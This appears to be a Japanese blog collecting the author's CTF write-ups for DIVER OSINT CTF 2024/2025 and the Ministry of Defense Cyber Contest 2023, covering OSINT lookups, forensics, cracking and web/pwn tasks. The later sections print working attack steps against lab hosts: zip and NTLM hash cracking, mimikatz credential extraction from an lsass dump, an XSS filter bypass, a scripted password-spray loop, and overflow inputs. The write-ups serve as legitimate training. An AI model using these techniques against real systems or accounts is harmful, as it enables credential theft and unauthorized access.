去年に引き続き、今年もOSINT特化型CTFであるDIVER OSINT CTF 2025にちょっとだけ参加しました。 土曜の12時から日曜の12時にかけての24時間開催でしたが、土曜日は家族の買い物で、日曜日は実家への帰省がある都合であんまりまともに取り組めず。

それでも、チーム 誕33な として33位という、ある意味完璧な順位を獲得することができました。

自分が解いたものだけWrite-upを残しておきます。

welcome

開幕のサーバの重さはドキドキするものがありましたが、開幕だけでしたね。運営さんお疲れさまでした…

phone / hardware / medium (441pts, 78 solves)

2016年7月23日～24日、この携帯電話の発売に先立ってEMI試験が行われた。試験は三重県の会社が実施したようだ。その試験に供された端末のシリアル番号を答えよ。
シリアル番号に / や - といった記号を含む場合、その記号も含めて記載すること。
Flag形式（例）: Diver25{123-45/6789-0}

シャープのSH-01Jというガラスマの写真。まずは愚直に技適の検査結果を探して見るものの、シリアル番号が書いてありそうな具体的な結果が添付されているものが見当たらず。 ふと思い立って、取説に各種認証番号が書いてあるのでは、と型番で検索。サイトに取説が丸ごと置いてあり、巻末の方を見るとエミッション周りでFCC-IDが記載されていた。 あとはそのFCC-IDから検査結果を見つけ出し、片っ端から見ていったところシリアル番号の記載を発見。submit。

hidden_service / introduction (100pts, 354 solves)

添付ファイルを確認して、Flagを獲得してください！
See the attached file and capture the flag!
Flag形式 / Flag Format: Diver25{xxxxxxxxxxxxxxxxx}

ごくシンプルにTor。手打ちが面倒くさいだけの入門問題でした。

document / introduction (100pts, 280 solves)

アメリカ海軍横須賀基地司令部（CFAY）は、米軍の関係者向けに羽田空港・成田空港と基地の間でシャトルバスを運行している。2023年に乗り場案内の書類を作成した人物の名前を答えよ。
Flag形式: Diver25{George Washington}

CFAYで検索して、シャトルバスの運行ガイドを探す。あとはPDFをひとつひとつ眺めていく。 dc:creator タグに <rdf:li>Mitchell.Donovan</rdf:li> の名前が書かれていて、これがフラグ。

UART / hardware / hard (495pts, 24 solves)

https://www.office-partner.de/tp-link-archer-ax20-12778639

この商品のイーサネットスイッチコントローラに直接UARTでアクセスを試みたい。どの部品の、どのピンにアクセスすればいいだろうか。
PCB上の部品番号 と、その部品の UART RX / UART TX ピン番号 を答えよ。ピン番号は部品の仕様に準拠せよ。
なお、ピンヘッダやコネクタが利用可能な場合でも、イーサネットスイッチコントローラのピン番号を答えてほしい。
Flag形式: Diver25{PCB上の部品番号_UART RXピン番号_UART TXピン番号}
（例えば、イーサネットスイッチコントローラが T21 という部品番号で、RXのピン番号が120、TXのピン番号が150であれば、Diver25{T21_120_150}となる）

最初見当違いのモデルを調べてしまっていて、いったん諦めて違う作業に移っていた。 解ける気がするんだよなーと戻ってきて、phone同様にFCC方面から調べていた。V2じゃないモデルだとinternal photoが低解像度でどうしようもない一方で、ちゃんとV2について調べると高解像度でチップの写真が出てきた。RTL8367S。 U7なのかU1なのか微妙な解像度だったこともありますが、チップの型番でググってピンアウトを確認してsubmit。

reconシリーズ

00_engineer はすでにチームリーダーが解いてくれていたので、パソカタ向けっぽい部分を巻き取ろうと検討。

04_internal / medium (416pts, 93 solves)

"00_engineer" の問題で見つかった会社では、Webブラウザからアクセス可能な社内用のDevOpsプラットフォームが運用されている。
そのシステムのバージョン名を、表記されている通りに答えよ。
Flag 形式: Diver25{135.0.1-f2+nightly}

DNS引きまくったりいろいろやっていく中で、試しにshodanに放り込んでみたら3000/tcpが空いてることが分かった。 アクセスしてみたらシンプルにGiteaが動いていて思わず笑うなどしつつ、バージョン名が書かれているのでそれをsubmit.

03_ceo / medium (302pts, 142 solves)

"00_engineer" の問題で見つかった会社の、CEOのメールアドレス（Gmail）を答えよ。

本人のGitHubを見ていたところ、forkされている痕跡に気付いたのでそれを見に行ったところ、XでCEOがハンズオンをやってくれたという発言に気付く。この素っ気ないのがCEOかー、ということでcloneしてcommit logを確認。submit.

それ以外

assetはMDM方面でいろいろ探しまくって完全に空振り。 designerは、img/logo.svg という使われていないロゴファイルが見つかったことからひたすらそれっぽいファイルを探すも空振り。もっとOSINTであることを意識すべきでした。 leakedは、HIBP等に放り込んで出てこなかったので、gitのGHArchiveを掘らないとだめかーと後回しにしてしまった。pastebinだったんですね……

感想

不完全燃焼だったなーという気持ちに尽きますね……タイミングの問題なのでしょうがないんですが。 また、recon問題を引きずったまま夜を迎えたんですが、全然寝付けず夢の中で解法に気付き、布団を抜け出して試してみたが的外れでした。 二度寝しても変な夢を見てしまい、日曜日の実家帰省は寝不足のまま運転することになりました。健康に悪い。

そんな感じでふがいないことこの上ないなか、他のチームメンバーがガンガン解きまくってくれたおかげで、いい感じの順位にこぎ着けました。本当に誘って良かったなーと思っています。

TsukuCTFの中の人から、今度OSINT限定のCTFやるからぜひぜひ、とお誘いいただいていたDIVER OSINT CTFに参加しました。 今回は「誕33な」というnumeronymなチームで、ふだんだらだらと参加しているDiscordのメンバーで参加しました。 CTFとはあまり縁のなさそうな層と思いきや、見事な調査能力を発揮しまくってくれた結果、18位という結果になりました。みんなすごい。

日程がビッグビッグランと被ったこと、家族サービスの関係であまり貼り付けなかったこともあり、もうちょっとがんばれたかも…という気持ちもありつつ、その手の問題はだいたい他のメンバーが解いてくれていたので本当に助かりました。

以下、最終的に自分がSubmitした問題についてのWriteupです。

leak / easy

先月、日本の会社で大規模なBTCの不正流出が起きた。
流出先となっているウォレットアドレスを答えよ。
Flag形式: Diver24{ウォレットアドレス}

先日のDMMの件。何かの間違いで1BTCぐらい送金されてくれないかなーと思っていたのですぐに発見できた。 "dmm btc leak address"で検索すると↓のPDFが出てきて、そこにアドレスが書いてあった。

https://www.btcc.com/ja-JP/academy/doc/ja-cryptocurrency-leak-incident-and-prevention-measures-dmm-bitcoin-48-2-billion-yen-worth-of-illegally-leaked.pdf

youtuber / medium

2023年、あるYouTuberが日本で無賃乗車や無銭飲食を行い、その様子を投稿したことで問題となった。
彼は日本である列車に無賃乗車をしていたところ、九州地方のある駅で一度捕まったが、そのまま逃走して別の列車に再び無賃乗車をした。
彼が捕まった駅と、乗り継いだ列車の列車番号を教えてほしい。なお、列車番号は時刻表に掲載されている形式で回答せよ。

Flag形式: Diver24{駅名_列車番号}
例えば、折尾駅で捕まり、456Mという列車に乗り換えた場合、Diver24{折尾_456M} となる。

TsukuCTFで見たやつだ！というわけで動画の特定は一瞬でできたものの、不愉快極まりない動画を真面目に見ないといけないという精神的なストレスが強烈な問題でした。

動画を見ていると長崎から岡山駅まで新幹線で移動していて、途中で捕まって脱走している。 その際に「さくら572 新大阪行き」に乗っているシーンがあるので、列車番号は572Aで良さそう。

乗り換えた駅についての情報が少なかった（最初は博多駅で捕まったと思っていたが違った）ので検索してみると、

matomame.jp

新鳥栖駅で乗り換えているという記事が見つかる。この組み合わせで提出したら正解だった。

wumpus / medium

とあるDiscordサーバにFlagが投稿されたぞ！
本問に限って、ターゲットに接触を試みても大丈夫だ。

(画像に書かれているURL)
https://discord.com/channels/1244302408402735114/1244302408402735117

サーバIDでググると https://discordservers.com/server/1244302408402735114 が出てくる。joinするとQRコードが貼られていて、読み取るとフラグが書いてある。

怪しいサービスでは？？？という裏取りに時間がかかってしまったパターンだった。

island / medium

「四方ぎり島」という名前の島における、最高地点の標高を整数（メートル）で答えよ。
Answer the highest elevation of the island named "四方ぎり島" in integer and metric.
Flag例 / Flag example: Diver24{3776}

南極大陸にある「四方ぎり島」であることをメンバーが突き止めてくれていたが、ArcGISの南極大陸標高地図は不正解。 別のソース"Antarctica elevation map" で探してこのあたりを見つけるも不正解。

"南極大陸 標高 地図"で検索すると国土地理院のサイトがヒットする。 場所は分かっているので https://www.gsi.go.jp/antarctic/viewer_03_25000_new.html www.gsi.go.jp

から見ていくと https://www.gsi.go.jp/antarctic/contents/000113891.gif に掲載されている。

power / medium

写真右側に写っている送電線の運用容量値（単位: MW） はいくつだろうか。整数で答えよ。
なお、この写真は2024年に撮影されたものである。
Flag形式: Diver24{100}

こちらもメンバーが場所を特定してくれていた。 送電線なら電力会社に情報があるはず、と思って関西電力を探して見るも、地図の見方と土地勘のなさから非常につらかったので、試しに「googlemap 送電線」で検索してみる。すると

私は全国の送電系統図をGoogleマップで公開していますが、東京・東北・関西以外の閲覧数が低迷しており、一部非公開・弊社お客さまのみへの提供も検討中です。
そこで、皆様のご利用状況をアンケートさせてください。https://t.co/zbmZwAAZHi

質問①
この送電系統図をご覧になったことはありますか？

— 松尾 豪 Go Matsuo (@gomatsuo) 2023年3月14日

このツイート…じゃなくてポストが出てくる。ありがたく開いて見ると東京電力のものしかないものの、詳細欄から関西電力版へのリンクが張られている。 それを見ながら画像の場所を探していくと、

関西電力送配電 送電系統図 - Google マイマップ

が出てきて、運用容量が書かれている。

感想

あんまり腰を据えて取り組めなかった割に、みんなの上澄みをかすめ取ってsubmitしている感じになってしまいたいへんアレですが、当初の目標は

目標は「ネトストスキルも楽しい使い途あるんだね！」程度で…　粘着しすぎると嫌な夢見るし……

だったので予想を遙かに上回る大善戦だったと思います。メンバーも(OSINT) CTFの楽しさを感じてもらえたと思うので、本当に誘って良かったなーと思っています。

ﾌﾟﾌﾟｰあの人博士号持ってるのにcrypto問全然解けてないじゃないですか（笑）って言われてもまあ今回のはcryptoっていうかなんというか…という感じなので許してください。

防衛省 サイバーコンテスト 2023 (防衛省CTF) に参加し、 403pts / 14位 でした。

目標は「低難易度の問題を全問正解」でしたが、思ったよりもフレンドリーな難易度でなんとかなりました。 苦手なpwnを全部解けたのはうれしいです。

Welcome

OpenVPNの設定ファイルが提供されるのでダウンロードして接続。 問い合わせ先メールアドレスを聞かれるのでflag{}に入れる。

[Forensics] The Place of The First Secret Meeting (10pts)

会社 A が内部告発を受け、海外の競合会社 B へ機密情報の持ち出しが行われた可能性があると判明しました。 退職予定の従業員が、共有パソコンへの接続が禁止されている USB メモリを用いてデータを抜き出し、USB メモリを引き渡したという内容でした。 そこで従業員を問い詰め、小さな USB ストレージを回収し、そのイメージを保全しました。

USB メモリの中には画像ファイルが入っていました。この画像が取引場所の可能性があります。この画像について、城の名前ではなく大きく写っている建物の名前を特定してください。 建物の名前をヘボン式ローマ字表記したものがフラグです。

あなたはフォレンジックエンジニアとして各フラグを取得してください。添付の仮想ディスクイメージ(USB1.vhd)内にフラグがあります。※このイメージファイルは「The Deleted Confidential File」、「They Cannot Be Too Careful.」、「The Taken Out Secrets」の問題でも使用します。

USB1.vhd が提供される。とりあえずマウントして中身を見てみる。 1.jpgがあり、城の画像。画像検索すると高松城であるらしい。

https://nishimagome.link/2020/03/01/takamatsujyo/#toc6

を見ると、これは「うしとらやぐら」というらしい。

ushitorayagura

[Forensics] The Deleted Confidential File (20pts)

圧縮アーカイブファイルとして持ち出されたデータは、USB メモリから削除されていた可能性があります。データの復旧を行い、その内容を調査してください。

※問題「The Place of The First Secret Meeting」に添付の USB1.zip ファイル内の仮想ディスクイメージファイルが対象です。

Windows File Recovery を使って復元する。

winfr i: work\CTFs\MODCTF2023\Forensics /extensive

jpg\0.jpg, zip/1.zip が出てくる。

$ unzip -l Recovery_20230806_092119/zip/1.zip
Archive:  Recovery_20230806_092119/zip/1.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        0  2023-06-07 09:09   重要/
        0  2023-06-01 10:53   重要/flag{Archive_file_was_deleted}.txt
   679900  2023-06-07 08:29   重要/要求提供的文件清单.pdf
---------                     -------
   679900                     3 files

flag{Archive_file_was_deleted} でOKだった。

[Forensics] They Cannot Be Too Careful. (10pts)

USB メモリから復旧できた圧縮アーカイブファイルには、パスワード保護がかかっていました。このパスワードを特定してください。

※問題「The Deleted Confidential File」で復旧したファイルが対象です。

fcrackzipでぶん回そうとしたらヒットしなかった。どうやら新しいバージョンのzipらしく、unzipが効かない。 仕方ないので調べてみると、zip2john経由でJohnすれば良いらしい。

$ ~/work/JohnTheRipper/run/zip2john 1.zip > ziphash.txt
ver 2.0 1.zip/�d�v/ is not encrypted, or stored with non-handled compression type
!? compressed length of AES entry too short.

$ ~/work/JohnTheRipper/run/john --wordlist=rockyou.txt ziphash.txt
Warning: invalid UTF-8 seen reading ziphash.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (ZIP, WinZip [PBKDF2-SHA1 256/256 AVX2 8x])
Loaded hashes with cost 1 (HMAC size) varying from 0 to 678498
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
oshiro           (1.zip/重要/要求提供的文件清单.pdf)
oshiro           (1.zip/�d�v/flag{Archive_file_was_deleted}.txt)
2g 0:00:00:06 DONE (2023-08-06 13:26) 0g/s 90486p/s 180972c/s 180972C/s sammy82..mizzmoss
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

$ ~/work/JohnTheRipper/run/john --show ziphash.txt
Warning: invalid UTF-8 seen reading ziphash.txt
1.zip/�d�v/flag{Archive_file_was_deleted}.txt:oshiro:�d�v/flag{Archive_file_was_deleted}.txt:1.zip:1.zip
1.zip/重要/要求提供的文件清单.pdf:oshiro:重要/要求提供的文件清单.pdf:1.zip:1.zip

2 password hashes cracked, 0 left

oshiro でした。

[Forensics] Their Perpetration (20pts)

直接データを取得したと考えられる端末の保全を行いました。調査対象のアーティファクトを解析し、持ち出しに使用された USB メモリのシリアルナンバーを特定してください。 なお、シリアルナンバー「04018636913bcb4e1152」のデバイスは保全の際に用いたものです。

NASPC.zip が提供される。マウントして展開するとイベントログなどを含むファイルが出てくる。 ひたすらそれっぽいイベントログを眺めて回る。正攻法ではない気がする……

Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx を漁ると、 「保全の際に用いた」という04018636913bcb4e1152の近くに0401396c0881735a013cが出てくる。これがフラグ。

[NW] Transfer (10pts)

「10.10.10.21」のサーバーは「example.com」ドメインの権威 DNS サーバーです。 このサーバー上に機密情報(フラグ)が隠されていますので、特定して回答してください。

名前からしてどう考えてもAXFRだろ、と思ったら大ハズレ。ダメ元でnmapしたら出てきました。

$ nmap -sV 10.10.10.21
Starting Nmap 7.80 ( https://nmap.org ) at 2023-08-06 11:04 JST
Nmap scan report for 10.10.10.21
Host is up (0.021s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
53/tcp open  domain  (unknown banner: flag{yExjq2D72ASL})
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/6%Time=64CEFFBD%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\0\0\0\x07version\x04b
SF:ind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x13\x12flag{yExjq2D72AS
SF:L}");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.75 seconds

調べると、こうやってbindのバージョンをたぐれるそうな。勉強になった。使いどころなさそうですが。

$ dig +short txt version.bind chaos @10.10.10.21
"flag{yExjq2D72ASL}"

[NW] Analysis (20pts)

あなたは組織内で発生した情報セキュリティインシデントを調査しています。 社内で攻撃の踏み台とされた端末(10.200.200.15)から外部宛の通信を調査しています。 プロキシログ(proxylog.txt)から不審なサーバ(C&C サーバ)宛へのログを見つけて、接続先の IP アドレスを特定してください。

proxylog.txtが与えられる。

$ cat proxylog.txt | awk -F, '{print $7,$8}' | sort | uniq
amazon_co_jp.ipa-info.net:22 HIER_DIRECT/2.57.80.99
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab? DIRECT/117.18.232.240
http://ocsp.entrust.net/MFEwTzBNMEswSTAJBgUrDgM DIRECT/23.42.76.131
http://www.gstatic.com/generate_204 DIRECT/142.251.42.163
news.google.com:443 HIER_DIRECT/172.217.26.46
news.yahoo.co.jp:443 HIER_DIRECT/182.22.25.252
news.yahoo.co.jp:443 HIER_DIRECT/183.79.217.124
thanks.yahoo.co.jp:443 HIER_DIRECT/182.22.25.252
twitter.com:443 HIER_DIRECT/172.217.25.69
twitter.com:443 HIER_DIRECT/183.79.250.123
twitter.com:443 HIER_DIRECT/216.58.197.163
URL Destnation Address
weather.yahoo.co.jp:443 HIER_DIRECT/183.79.250.123
www.google.co.jp:443 HIER_DIRECT/216.58.197.163
www.yahoo.co.jp:443 HIER_DIRECT/182.22.25.252
www.yahoo.co.jp:443 HIER_DIRECT/183.79.217.124

amazon_co_jp.ipa-info.net:22 HIER_DIRECT/2.57.80.99 が怪しい。試してみると、これが正解のアドレスだった。

flag{2.57.80.99}

[NW] Enumeration (20pts)

「10.10.10.22」のサーバーにインストールされているソフトウェア(Postfix)のバージョンを特定し、回答してください。

本来はpostfixのバージョンを探っていく必要がありそうですが、ダメ元で新しい方から順に総当たりしたら当たった。3.7.5でした。 想定解はどうやるものだったんでしょうか……

[Programming] Regex Exercise (10pts)

たくさんの偽のフラグに混ざった本物のフラグを見つけてください。本物のフラグは

Regexp "!!" を含む3文字 数字2けた "S" で始まる5文字以上の英単語 一の位が "8" の数値 がこの順番で並んだものです。

flag\{Regexp(!!.|.!!)[0-9]{2}S.{4,}8\}

で引っ掛ければよい。自分はvscodeを使いました。ハイライトされるので便利。

flag{Regexp:!!15Splendid159156098}

[Programming] Mimic Unicode (20pts)

mimic.txt の文字列内に隠されているフラグを見つけてください。

結合すると「ゴ」になる文字が並んでいるっぽい。
UTF-8では 
E3 82 B4
E3 82 B3 E3 82 99

のどちらか。なので0と1に対応させてデコード。

def binary_to_ascii(binary_string):
    ascii_output = ''.join([chr(int(binary_string[i:i+8], 2)) for i in range(0, len(binary_string), 8)])
    return ascii_output

def main():
    with open('mimic.txt', 'rb') as f:
        content = f.read()

    binary_string = content.replace(b'\xe3\x82\xb4', b'0').replace(b'\xe3\x82\xb3\xe3\x82\x99', b'1')
    binary_string = binary_string.decode('utf-8')

    ascii_output = binary_to_ascii(binary_string)
    print(ascii_output)

if __name__ == "__main__":
    main()

flag{Un1c0de_N0rma|1z@t10n}

[Trivia] Threat (10pts)

コンピューターシステムを侵害し、身代金を目的としてデータを暗号化したり、アクセスをブロックしたりするマルウェアは何ですか。

ランサムウェア

[Trivia] Behavior (10pts)

エージェントを使用してエンドポイント上のふるまいを検知し、異常な活動を検出し、攻撃に対する即座な応答を可能にするエンドポイントセキュリティ技術は何ですか。

EDR

Copilot入れたvscodeでメモしてたら、問題文を入力した段階で答えが出てきて笑った。すごい。

[Trivia] Inventor (10pts)

RSA 暗号の R の由来になった人物は誰でしょうか?ラストネームをお答えください。

リベスト

[Forensics] The Taken Out Secrets (30pts)

パスワードがかかっていた圧縮アーカイブファイルの中には、機密情報リストが書かれている PDF ファイルが入っていました。 この PDF ファイルを解析しフラグを取得してください。

※問題「They Cannot Be Too Careful.」でパスワードを特定したアーカイブファイルが対象です。

PDFを開くと文字列の上に画像が載っかっている。

$ pdftotext the.pdf -
2020_プロジェクト仕様書
機密特許文書_001.docx
新製品_設計図.zip
新製品開発ロードマップ.pptx
供給者契約書_署名 2020.pdf
R&D_内部報告書_Q2_2020.docx
戦略計画_2020-2025.pptx
プロジェクトコスト見積もり.xlsx
製造工程.pdf
顧客リスト_2020.xlsx
役員会議事録_20200316.pdf
財務報告書_2020.zip
flag{pdf__is_
商業マニュアル Ver5.0.pdf
従業員機密保持契約.zip
未公開特許申請_202003.pdf
保留中契約交渉.docx
特許侵害調査報告書.pdf
生産スケジュール_Q3_2020.xlsx
市場分析.pptx
競合他社市場分析_2020.xlsx
プロトタイプ試験結果.docx
品質管理内部報告書_0323.docx

flag{pdf_is_ が確認できる。続けて探していく。

$ pdfimages -all the.pdf out

でout-000.pngを出力。青空白猫のステガノグラフィー解析で見ると _format!!?} が見える。間に何かありそう。

$ strings the.pdf | fgrep URI
/S /URI
/URI (X3BheWxvYWRfX2RlbGl2ZXJ5Xw\075\075)

$ echo 'X3BheWxvYWRfX2RlbGl2ZXJ5Xw==' | base64 --decode
_payload__delivery_

それっぽいのがあった。全部組み合わせるとフラグになる。アンダースコアが2つずつなのに気づかなくて焦った…

flag{pdf__is__payload__delivery__format!!?}

[Web] Basic (10pts)

情報セキュリティ担当のジョナサンは、退職者が利用していたパソコンの通信ログを確認していたところ、Basic 認証でアクセス制限がかけられているhttp://10.10.10.6/Aw6dfLUM/ へアクセスしていることが判明しました。

提供したパソコンの通信ログ(Basic.pcapng)を確認して認証情報を探し出してください。 フラグはその Basic 認証でのログイン後のページにあります。

Basic ZmxhZzphR3lSc3FwbmEzRDM=

でアクセスしている。Basic認証はユーザ:パスワードをbase64したやつ。

$ echo 'ZmxhZzphR3lSc3FwbmEzRDM=' | base64 --decode
flag:aGyRsqpna3D3

[Web] Discovery (10pts)

ゲーム会社に勤めているジョナサンが管理しているサイト( http://10.10.10.6/Wg6LQhmX/ ) 配下のディレクトリに、機密情報(flag)が記載されたテスト用の html ファイルが公開されていると連絡を受けました。 ジョナサンはサイトにあるリンクたどって該当ファイルを見つけ出そうとしましたが、うまくいきませんでした。 攻撃者はどのようにして機密情報(flag)を見つけだしたのでしょうか? あなたは機密情報(flag)を見つけ出し記載されたフラグを確認してください。

ほんとにいいの…？と思いながらdirbをぶん回す。ヒントにもあるが、.htmlであることに気づけるかがポイントだった。気づけなかったのでヒント減点を食らったのが痛い。

$ dirb http://10.10.10.6/Wg6LQhmX/
でgames が見つかる。

$ dirb http://10.10.10.6/Wg6LQhmX/games -X .html

http://10.10.10.6/Wg6LQhmX/games/admin.html にフラグがある。

flag{L1h$ZL-!-,es}

[Web] Bypass (20pts)

上司のクリストファーはセキュリティ会社に脆弱性診断の依頼をした際、アンケートフォーム( http://10.10.10.7/46am9tjb/ ) に、クロスサイトスクリプティングの脆弱性が検出されたと報告を受けました。 このページでは JavaScript を実行されないように対策をとっているため、納得できてないようです。 上司はあなたに JavaScript を実行できるか確認するようにお願いしてきました。 以下のような alert 関数を実行できればフラグが表示されます。

<script>alert(1)</script>

scriptという文字列を消すっぽい動作をする。のでうまくやってやるとscriptが残せる。

• <scrSCRIPTipt>alert(1)</scrSCRIPTipt>を入れる
• onsubmitの処理をフックしてreturn trueさせる

flag{dfvK#L-]BF?M}

[Web] Spray (20pts)

人事部のマネージャーをしているジェシカは、社内ポータルサイト http://10.10.10.7/mpk5tdbu で推測が容易なパスワード、 password か 123456789 のいずれかを利用している従業員がいると報告を受けた。どの従業員が推測可能なパスワードを利用しているか突き止めてください。フラグは、そのユーザーでログインしたページにあります。

以下のアカウントを利用して従業員のアカウント情報を確認してください。

ログイン画面:http://10.10.10.7/mpk5tdbu/ id:user1 PW:diejuthdkfi14 従業員は100名登録されており、従業員情報は上記のアカウント情報でログイン後、http://10.10.10.7/mpk5tdbu/prof/ で確認ができます。

• http://10.10.10.7/mpk5tdbu/ にログイン. user1 : diejuthdkfi14

• プロフィールは http://10.10.10.7/mpk5tdbu/prof.php?id=1 のようにして取得。1-100まで。

• まずはアカウント名を集める。こんな感じのスクリプトでまるごとダウンロード。curlの部分はcopy as cURLで。

for i in {1..100}; do

curl "http://10.10.10.7/mpk5tdbu/prof.php?id=${i}" \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H 'Accept-Language: ja' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Cookie: PHPSESSID=bi75arvjronkhs2bvr64kna8ch' \
  -H 'DNT: 1' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://10.10.10.7/mpk5tdbu/dashboard.php' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' \
  --compressed \
  --insecure \
  --output ${i}.html
done

• 続いてそれらのファイルからメールアドレスの@より前の部分を抜き出す。（@入れると画面でエラーになる親切設計）

fgrep メールアドレス *.html | awk -F\  '{print $3}' | sed 's#</p>##g' | sed 's/^ //g' | awk -F@ '{print $1}'

• あとはcurlでログイン処理を書いて…とするが、=が入るパターンはcurlでうまく行かない気がしたので先に手動で確認。いずれもハズレだったので、スクリプトでは除外しつつぶん回す。

for uid in `cat ids.txt | fgrep -v =`; do
  for pass in password 123456789; do
curl 'http://10.10.10.7/mpk5tdbu/login.php' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
  -H 'Accept-Language: ja' \
  -H 'Cache-Control: no-cache' \
  -H 'Connection: keep-alive' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'DNT: 1' \
  -H 'Origin: http://10.10.10.7' \
  -H 'Pragma: no-cache' \
  -H 'Referer: http://10.10.10.7/mpk5tdbu/login.php' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' \
  --data-raw "userID=${uid}&password=${pass}" \
  --compressed \
  --insecure \
  --output out/${uid}_${pass}.html

  done
done
exit 0

ダウンロードできたら、「正しくありません」が含まれないファイルを探す。

grep -rL 正しくありません *.html

kimi_ihara:123456789があたり。ログインするとフラグが表示される。

flag{?]_P43gUR?yK}

[Crypto] Simple Substitution Cipher (10pts)

以下の暗号文を復号してください。

暗号文: synt{tA0iEFckNRiG}

ROT13. 数字はROTしない。CyberChefで試行錯誤してあたった。ひどい。

flag{gN0vRSpxAEvT}

[Crypto] Substitution Cipher (10pts)

暗号文は、以下の対応表(SubstitutionCipher.png)と鍵により暗号化されていますが、鍵の一部(1文字目、4文字目の?)が欠損しています。 暗号文から欠損している鍵を推測し、復号してください。

暗号文: Uckb uzzc jn gwdmayuzf fjoj ciz Xrhzpèaf xkyizt.ciz hubb kb ggcp{wIR2AuVebMyR}. 鍵: ?VC?

ヴィジュネル暗号の対応表が提供される。

ggcp{...}がフラグっぽいので、これがflag{...}になるような ?VC? のパターンを気合いで探す。 鍵は BVCJ になるので、CyberChefに投げて解読。アクサンが付いてる部分でうまく行かないので面倒だった。本質じゃないところで苦労するのはあまり楽しくないですね……

flag{vNP2RtAcsLdP}

[Crypto] Administrator Hash（NTLM hash） (20pts)

lsass.zip を展開(パスワード:P@ssw0rd123!)し、Administrator ユーザーの NTLM ハッシュ値を抽出してください。

mimikatz問題。っていうかこれcryptoですかね…？？？

WindowsDefenderに怒られないようにするのが一番難しかったです。（除外しましょう）

mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # sekurlsa::Minidump lsass.DMP
Switch to MINIDUMP : 'lsass.DMP'

mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.DMP' file for minidump...

Authentication Id : 0 ; 494373 (00000000:00078b25)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-A9FVQCU510J
Logon Server      : WIN-A9FVQCU510J
Logon Time        : 2023/06/14 14:05:23
SID               : S-1-5-21-475754373-2222522093-564401973-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-A9FVQCU510J
         * NTLM     : 036dac4f519817e0f6ec28d80ab42205
         * SHA1     : 5cca0adce30b6164666d52ac52ee78e75f0bc3d6
(snip)

flag{036dac4f519817e0f6ec28d80ab42205}

[Crypto] Administrator Password (20pts)

問題「Administrator Hash(NTLM hash)」で抽出したハッシュ値から、Administrator ユーザーのパスワードを推測してください。

これほんとにcrypto問なんｄ（ｒｙ

$ ~/work/JohnTheRipper/run/john --format=NT --wordlist=rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Ilovedoraemon39  (?)
1g 0:00:00:02 DONE (2023-08-06 16:50) 0g/s 4056Kp/s 4056Kc/s 4056KC/s Ilovefred..Ilovechihuahuas
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.

flag{Ilovedoraemon39}

[Pwn] Auth (10pts)

ログイン機能を作ってみました。By C 言語ルーキー

Ghidraで開く。どうやらuser=adminで、passがflagと一致するかを見ているっぽい。 その後で、何故か比較結果を基に文字列として"true"と比較する処理が入っているので、 オーバーフローした部分が比較箇所になるように調整すればよい。

   _____          __  .__
  /  _  \  __ ___/  |_|  |__
 /  /_\  \|  |  \   __\  |  \
/    |    \  |  /|  | |   Y  \
\____|__  /____/ |__| |___|  /
        \/                 \/

User: admin
Password: AAAAAAAAAAAAAAAAAAAAAAAAAAtrue
Login succeeded!!
flag: DUMMY-FLAG

[Pwn] Festival (10pts)

祭りだ!祭りだ! flag を購入してね。

がちゃがちゃやってたら解けちゃった問。たぶんクソデカ掛け算でクソデカ残高にしてるはず。

___________              __  .__              .__
\_   _____/___   _______/  |_|__|__  _______  |  |
 |    __)/ __ \ /  ___/\   __\  \  \/ /\__  \ |  |
 |     \  ___/ \___ \  |  | |  |\   /  / __ \|  |__
 \___  / \___  >____  > |__| |__| \_/  (____  /____/
     \/      \/     \/                      \/

Balance : 1000
==Menu==
1. Ramune : 100
2. Yakitori : 200
3. Beer : 300
4. Yakisoba : 500
5. Flag : 1000000000

Staff > What do you want to buy?
Staff > Input menu number.
 You  > 5
Staff > How many?
 You  > 10000000001
